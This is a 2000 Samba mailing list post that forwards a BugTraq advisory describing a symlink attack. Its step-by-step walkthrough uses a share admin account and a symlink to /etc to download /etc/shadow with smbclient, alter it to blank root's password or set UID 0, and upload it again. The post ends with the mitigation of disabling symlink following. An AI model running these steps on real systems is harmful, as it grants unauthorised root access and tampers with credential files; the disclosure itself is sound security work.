BugTraq Post: Symlink attack in (all?) Samba. - Local root walkthrough by Tozz

Scott Gifford sgifford at tir.com
Fri Dec 15 05:54:17 GMT 2000

This was posted to BugTraq earlier today; thought I'd put a copy here
in case anybody hadn't seen it.

I don't think that this "attack" is particularly surprising.
Basically, he is leveraging a Samba "admin user" account into a UNIX
root account, using a symlink (created from a shell) to get outside of
the share.

It seems to me like a "leveraging root to get root" attack, but I
guess if somebody had fileserver admins that were less trusted than
their UNIX admins, it could be an issue.


From: Tozz <tozz at HACKERS4HACKERS.ORG>
Subject:      Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
Date:         Thu, 14 Dec 2000 00:17:51 +0100
Reply-To: Tozz <tozz at HACKERS4HACKERS.ORG>

Symlink attack in (all?) Samba. - Local root walkthrough by Tozz


* Shell access or any other way to create symlinks
* A running samba deamon
* The username and/or password of a user named in the
  admin lists in one or more shares.
* Brains are not required.

By default, Samba (http://www.samba.org) followes symlinks, which can lead
root promises. Here is an example:

I have a guy that sorts out all my uploads through SMB, he has 'admin'
(admin users = username).. This means he will work as UID 0 (root).

e.g. we have this share in /etc/smb.conf

 path = /home/ftp/incoming
 comment = Uploads that came through anon ftp
 guest ok = no
 writeable = no
 force create mode = 0755
 force directory mode = 0755
 admin users = warezmaster

Login to the shell, or find some other way to create symlinks
and create a symlink in /home/ftp/incoming
you do something like

ln /etc -s

now type on you're box (local or remote works both):
smbclient file://foobar.com/uploads -U warezmaster
it will ask for a password, enter it and you will get something like


There we go

smb\:>cd etc
smb\:>get shadow

[root at embrace /root]
now you downloaded the shadow file on you're localbox
edit it, change you're UID to 0, or remove the password
from the root account (no password required at logon)

login with smbclient again

smbclient file://foobar.com/uploads -U warezmaster
enter the password

and reupload

smb\:>cd etc
smb\:>put shadow

that's it, now login to the shell, if you changed you're own uid
you are now root. If you removed the password from root account
just su to it and you wont need a password.


The 'Follow Symlinks' can be turned off, but it's on by default.


Disable Follow Symlinks

Tozz (tozz at hackers4hackers.org)

You can contact me on AxeNet (irc.axenet.org channel #axenet).nickname: Tozz
or MemoServ me when I'm not online.

More information about the samba-technical mailing list